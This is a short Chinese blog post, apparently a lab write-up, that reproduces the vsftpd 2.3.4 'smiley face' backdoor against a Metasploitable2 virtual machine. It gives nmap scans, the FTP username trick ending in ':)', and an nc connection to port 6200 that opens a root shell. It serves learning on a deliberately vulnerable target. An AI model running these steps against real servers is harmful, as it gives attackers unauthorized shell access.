标签:nmap 笑脸 192.168 漏洞 6200 复现 靶机 79.131
笑脸漏洞复现
工具:
攻击机:kali 192.168.79.128
靶机:Metasplotable2-Linux 192.168.79.131
复现过程
打开 kali 终端,执行以下命令:nmap 主机IP/24
发现靶机 (192.168.118.131) 打开着 21 端口
输入命令:nmap -sV 靶机IP
可以看到靶机的ftp服务的版本信息是vsftpd 2.3.4,存在漏洞
输入命令:ftp 192.168.79.131 21
用户名: root:)//‘:)’ 是笑脸漏洞的触发条件
密码:123456 可以随意设置
执行命令:nmap -p 6200 192.168.79.131发现靶机打开了6200端口及后门
通过命令:nc 192.168.79.131 6200 连接这个端口
成功连接变建立了后门shell,可以开始执行命令
标签:nmap,笑脸,192.168,漏洞,6200,复现,靶机,79.131 来源: https://blog.csdn.net/m0_62826547/article/details/121917166
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。